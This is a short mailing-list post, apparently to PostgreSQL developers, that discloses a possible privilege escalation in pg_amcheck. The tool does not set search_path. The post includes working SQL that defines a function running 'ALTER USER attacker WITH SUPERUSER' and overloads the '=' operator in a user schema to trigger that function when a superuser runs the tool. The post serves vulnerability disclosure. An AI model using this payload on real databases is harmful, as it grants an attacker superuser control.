Permission elevation by pg_amcheck operator overloading via search_path possible?

Pavel Borisov Fri, 22 May 2026 05:40:08 -0700

Hi, hackers!

As I see pg_amcheck doesn't set search_path.


It runs SQL queries like:
SELECT n.nspname, x.extversion FROM pg_catalog.pg_extension x JOIN
pg_catalog.pg_namespace n ON x.extnamespace = n.oid WHERE x.extname =
'amcheck'

Let's suppose search_path for database is set:
 search_path = 'myschema, pg_catalog'
Then
CREATE FUNCTION myschema.evil(name, name) RETURNS bool AS $$
    ALTER USER attacker WITH SUPERUSER;
    SELECT $1 OPERATOR(pg_catalog.=) $2;
  $$ LANGUAGE sql;
  CREATE OPERATOR myschema.= (LEFTARG = name, RIGHTARG = name,
PROCEDURE = myschema.evil);
Then run pg_amcheck as superuser.

So the user attacker can become SUPERUSER.

Is this scenario worth fixing?

Regards,
Pavel Borisov
Supabase

Permission elevation by pg_amcheck operator overloading via search_path possible?

Reply via email to